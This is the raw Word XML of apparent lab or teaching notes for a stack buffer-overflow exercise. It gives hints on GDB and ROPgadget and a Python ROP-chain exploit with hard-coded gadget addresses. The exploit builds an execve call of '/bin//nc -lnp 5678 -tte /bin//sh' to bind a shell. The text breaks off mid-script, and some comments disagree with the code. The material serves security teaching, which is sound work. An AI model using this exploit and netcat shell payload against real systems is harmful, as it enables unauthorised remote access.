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F31BE" w14:textId="628BC43A" w:rsidR="002B4578" w:rsidRDefault="002B4578" w:rsidP="002B45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lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>the first step is to just overflow the buffer.  Encourage a bit of playing with GDB and binary search.  It </w:t>
      </w:r>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>should</w:t>
      </w:r>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> be 44 bytes then the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>address.I've</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> added an additional step to fix up and run the shellcode </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>ROPgadget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> generates.  Just add the appropriate number of </w:t>
      </w:r>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="E01E5A"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">s to pad and run and it should be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>good.The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> next step is to tweak the exploit script given so that you can run reverse shell.  All the gadgets will need different addresses (use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="E01E5A"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>ROPgadget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t> to find them), and some may not be available or be slightly different (I had a different sequence of </w:t>
      </w:r>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="E01E5A"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">s).  If so </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>thats</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> fine... you just need to adjust the order things go on the stack after the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>gadget.Once</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> things are running start checking things are actually in the right registers (break on the pop all and manually check with GDB, see hints section).  They may find strings </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>arent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> null terminated for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B4578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> (its somewhat lucky).  I took to adding the null terminators by hand, something like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F3D504" w14:textId="77777777" w:rsidR="002B4578" w:rsidRPr="002B4578" w:rsidRDefault="002B4578" w:rsidP="002B45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lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E40629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POPEDX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCD3F51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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C02D9F8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XOREAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2470ED3E" w14:textId="733FBC2A" w:rsid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MOVISTACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F227C8F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</w:p>
    <w:p w14:paraId="1B4A1774" w14:textId="19A73CCB" w:rsidR="002B4578" w:rsidRPr="002B4578" w:rsidRDefault="002B4578" w:rsidP="002B45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2B4578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But that will null out 4 bytes so ensure that you don't overwrite something you've already added... </w:t>
      </w:r>
      <w:r w:rsidRPr="002B4578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r w:rsidRPr="002B4578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Other than that... mostly fine.</w:t>
      </w:r>
      <w:r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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B4578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It</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B4578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seems harder than it actually is!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D186C7" w14:textId="3FD3E6BA" w:rsidR="002E32E4" w:rsidRDefault="002E32E4"/>
    <w:p w14:paraId="3F474324" w14:textId="4DE8CD18" w:rsidR="002B4578" w:rsidRDefault="002B4578"/>
    <w:p w14:paraId="7710E676" w14:textId="5E66276A" w:rsidR="002B4578" w:rsidRDefault="002B4578"/>
    <w:p w14:paraId="3B949DDE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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F791DAC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This is a demo python script that creates a ROP chain to launch </w:t>
      </w:r>
      <w:proofErr w:type="spell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nc</w:t>
      </w:r>
      <w:proofErr w:type="spell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 as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74742905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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2756A758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</w:p>
    <w:p w14:paraId="425E9EA1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proofErr w:type="gram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#!/</w:t>
      </w:r>
      <w:proofErr w:type="gram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usr/bin/env python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F86127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from struct import pack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB3E6C4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import </w:t>
      </w:r>
      <w:proofErr w:type="spell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os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09A8BFA1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######################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CC2F79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proofErr w:type="spell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fileName</w:t>
      </w:r>
      <w:proofErr w:type="spell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='exploit'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19460056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proofErr w:type="spell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outfile</w:t>
      </w:r>
      <w:proofErr w:type="spell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=</w:t>
      </w:r>
      <w:proofErr w:type="gram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open(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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fileName</w:t>
      </w:r>
      <w:proofErr w:type="spell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, "</w:t>
      </w:r>
      <w:proofErr w:type="spell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wb</w:t>
      </w:r>
      <w:proofErr w:type="spell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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D87B2BE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# </w:t>
      </w:r>
      <w:proofErr w:type="gram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this</w:t>
      </w:r>
      <w:proofErr w:type="gram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 is just to create variables of the gadgets that we will be using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E0F226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proofErr w:type="gram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STACKADDR  =</w:t>
      </w:r>
      <w:proofErr w:type="gram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 0x080d9060</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B66E73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STACK      = </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", 0x080d9060) # @ .data </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B81907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INT80      = </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", 0x080495f3) # int $0x80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA506EB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proofErr w:type="gram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MOVISTACK  =</w:t>
      </w:r>
      <w:proofErr w:type="gram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 pack("&lt;I", 0x08056cf5) # mov %</w:t>
      </w:r>
      <w:proofErr w:type="spell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eax</w:t>
      </w:r>
      <w:proofErr w:type="spell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,(%</w:t>
      </w:r>
      <w:proofErr w:type="spell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edx</w:t>
      </w:r>
      <w:proofErr w:type="spell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) | ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05075C5C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INCEAX     = </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", 0x0807b6da) # </w:t>
      </w:r>
      <w:proofErr w:type="spell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inc</w:t>
      </w:r>
      <w:proofErr w:type="spell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 %</w:t>
      </w:r>
      <w:proofErr w:type="spell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eax</w:t>
      </w:r>
      <w:proofErr w:type="spell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 | ret </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066EF9FC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POPALL     = </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", 0x0806e261) # pop %</w:t>
      </w:r>
      <w:proofErr w:type="spell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edx</w:t>
      </w:r>
      <w:proofErr w:type="spell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 | pop %</w:t>
      </w:r>
      <w:proofErr w:type="spell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ecx</w:t>
      </w:r>
      <w:proofErr w:type="spell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 | pop %</w:t>
      </w:r>
      <w:proofErr w:type="spell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ebx</w:t>
      </w:r>
      <w:proofErr w:type="spell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 | ret;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A78F3BD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# </w:t>
      </w:r>
      <w:proofErr w:type="gram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we</w:t>
      </w:r>
      <w:proofErr w:type="gram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 are mainly interested in pop %</w:t>
      </w:r>
      <w:proofErr w:type="spell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edx</w:t>
      </w:r>
      <w:proofErr w:type="spell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, thus there will be pre and post dummy data for %</w:t>
      </w:r>
      <w:proofErr w:type="spell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edx</w:t>
      </w:r>
      <w:proofErr w:type="spell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 and %</w:t>
      </w:r>
      <w:proofErr w:type="spell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ebx</w:t>
      </w:r>
      <w:proofErr w:type="spell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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2B8688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POPEAX     = </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", 0x080a8986) # pop %</w:t>
      </w:r>
      <w:proofErr w:type="spell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eax</w:t>
      </w:r>
      <w:proofErr w:type="spell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 | ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D4E653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POPEDX     = </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", 0x0806e23b) # pop %</w:t>
      </w:r>
      <w:proofErr w:type="spell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edx</w:t>
      </w:r>
      <w:proofErr w:type="spell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 | ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0794CC9B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XOREAX     = </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", 0x080562b0) # </w:t>
      </w:r>
      <w:proofErr w:type="spell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xor</w:t>
      </w:r>
      <w:proofErr w:type="spell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 %</w:t>
      </w:r>
      <w:proofErr w:type="spell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eax</w:t>
      </w:r>
      <w:proofErr w:type="spell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,%</w:t>
      </w:r>
      <w:proofErr w:type="spell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eax</w:t>
      </w:r>
      <w:proofErr w:type="spell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 | ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727A109A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DUMMY      = </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", 0x90909090) # padding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDBC9EC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</w:p>
    <w:p w14:paraId="3DDE44D1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proofErr w:type="gram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 =</w:t>
      </w:r>
      <w:proofErr w:type="gram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 bytes("A" * 44, 'ascii')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1302D6DA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</w:p>
    <w:p w14:paraId="6EF92343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buff += POPALL </w:t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  <w:t># it's via %</w:t>
      </w:r>
      <w:proofErr w:type="spell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ecx</w:t>
      </w:r>
      <w:proofErr w:type="spell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 we will build our stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CAB8C6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STACK</w:t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  <w:t># %</w:t>
      </w:r>
      <w:proofErr w:type="spell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edx</w:t>
      </w:r>
      <w:proofErr w:type="spell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 contain the stack address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1F7274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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73767C8B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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2394C760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POPEAX</w:t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  <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spell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Lets</w:t>
      </w:r>
      <w:proofErr w:type="spell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 put content in an address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB1707D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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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bytes(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"/</w:t>
      </w:r>
      <w:proofErr w:type="spell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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spell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", 'ascii')</w:t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  <w:t># put "/</w:t>
      </w:r>
      <w:proofErr w:type="spell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usr</w:t>
      </w:r>
      <w:proofErr w:type="spell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" in %</w:t>
      </w:r>
      <w:proofErr w:type="spell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eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B35313E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MOVISTACK</w:t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  <w:t># put "/bin" in stack address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AEFC75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</w:p>
    <w:p w14:paraId="0E17BB52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POPALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F79EFB7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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 4)</w:t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  <w:t># we change our stack for to point after "/bin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EE0F6E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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED2C189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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16575EB1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</w:p>
    <w:p w14:paraId="30D86F70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POPEAX</w:t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  <w:t># Applying the same for "/</w:t>
      </w:r>
      <w:proofErr w:type="spell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nc</w:t>
      </w:r>
      <w:proofErr w:type="spell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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A37EBEF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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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bytes(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"//</w:t>
      </w:r>
      <w:proofErr w:type="spell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nc</w:t>
      </w:r>
      <w:proofErr w:type="spell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", 'ascii')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E631E45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MOVISTACK</w:t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  <w:t># we place "//</w:t>
      </w:r>
      <w:proofErr w:type="spell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nc</w:t>
      </w:r>
      <w:proofErr w:type="spell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" after "/bin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8D0D04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</w:p>
    <w:p w14:paraId="7D392505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POPALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144E3777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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 9)</w:t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  <w:t># we change our stack for to point after "bin//nc"+1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B29372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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CF2D45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DUMMY</w:t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  <w:t xml:space="preserve"># padding </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F087406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</w:p>
    <w:p w14:paraId="025800B8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# </w:t>
      </w:r>
      <w:proofErr w:type="gram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we</w:t>
      </w:r>
      <w:proofErr w:type="gram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 repeated operation for each argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0520541C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POPEAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444771AB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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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bytes(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"-</w:t>
      </w:r>
      <w:proofErr w:type="spell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lnp</w:t>
      </w:r>
      <w:proofErr w:type="spell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", 'ascii')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E08023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MOVISTACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A06CCB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</w:p>
    <w:p w14:paraId="637A9CC8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POPEDX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DD9A37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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 13)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D722FF5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XOREAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A6AD23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MOVISTACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154CD71B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</w:p>
    <w:p w14:paraId="3FE4F3E9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</w:p>
    <w:p w14:paraId="4D6E1377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POPALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED87E9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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 14)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D83BAA7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DUMMY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019C7DAD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DUMMY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8E03A0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</w:p>
    <w:p w14:paraId="422E10A8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POPEAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C41C1E3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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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bytes(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"5678", 'ascii')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B81EE6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MOVISTACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8613BB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</w:p>
    <w:p w14:paraId="25AFACED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POPEDX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F89CF38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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DF905A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XOREAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB1B3F2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lastRenderedPageBreak/>
        <w:t>buff += MOVISTACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F51304A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</w:p>
    <w:p w14:paraId="18B67DDF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POPALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C079893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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 19)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A74FA99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DUMMY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BE8617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DUMMY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2AF747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</w:p>
    <w:p w14:paraId="675D06E1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POPEAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DDC665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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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bytes(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"-</w:t>
      </w:r>
      <w:proofErr w:type="spell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tte</w:t>
      </w:r>
      <w:proofErr w:type="spell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", 'ascii')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3510F6AB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MOVISTACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D3E033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</w:p>
    <w:p w14:paraId="694CFBD0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POPEDX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49653AFF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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 23)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9519B5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XOREAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32082320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MOVISTACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D384B74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</w:p>
    <w:p w14:paraId="73B39042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POPALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB21C34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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF0C3D8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DUMMY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0895FDDA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DUMMY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D385980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</w:p>
    <w:p w14:paraId="75CE8460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POPEAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB940E7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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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bytes(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"/bin", 'ascii')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FB924A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MOVISTACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15281FD0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</w:p>
    <w:p w14:paraId="3F593D03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POPALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D867CBF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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 28)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6C915E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DUMMY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F117ECA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DUMMY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D39FBB3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</w:p>
    <w:p w14:paraId="7479E694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POPEAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038FB2D5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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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bytes(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"//</w:t>
      </w:r>
      <w:proofErr w:type="spell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sh</w:t>
      </w:r>
      <w:proofErr w:type="spell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", 'ascii')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACC3A9E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MOVISTACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F1A3CD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</w:p>
    <w:p w14:paraId="1C25D899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POPEDX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F33959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buff += </w:t>
      </w:r>
      <w:proofErr w:type="gram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pack(</w:t>
      </w:r>
      <w:proofErr w:type="gram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"&lt;I", STACKADDR + 32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EC0E61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XOREAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0939A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MOVISTACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695B583B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</w:p>
    <w:p w14:paraId="7054AEBD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#buff += DUMMY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC08AA8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</w:p>
    <w:p w14:paraId="249454EE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#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698AF8B6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# We currently have our list of elements separated by \0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13745E8C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# Now we must construct our char ** </w:t>
      </w:r>
      <w:proofErr w:type="gram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i.e.</w:t>
      </w:r>
      <w:proofErr w:type="gram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 array '</w:t>
      </w:r>
      <w:proofErr w:type="spell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argguments</w:t>
      </w:r>
      <w:proofErr w:type="spell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' of strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725BE112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# arguments</w:t>
      </w:r>
      <w:proofErr w:type="gram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=[</w:t>
      </w:r>
      <w:proofErr w:type="gram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 @"/bin//nc", @"-lnp", @"6666", @"-tte", @"/bin//sh"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D662EE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# </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409E13CF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</w:p>
    <w:p w14:paraId="0B6AD3C1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POPALL</w:t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</w:p>
    <w:p w14:paraId="1C4A47A4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buff += </w:t>
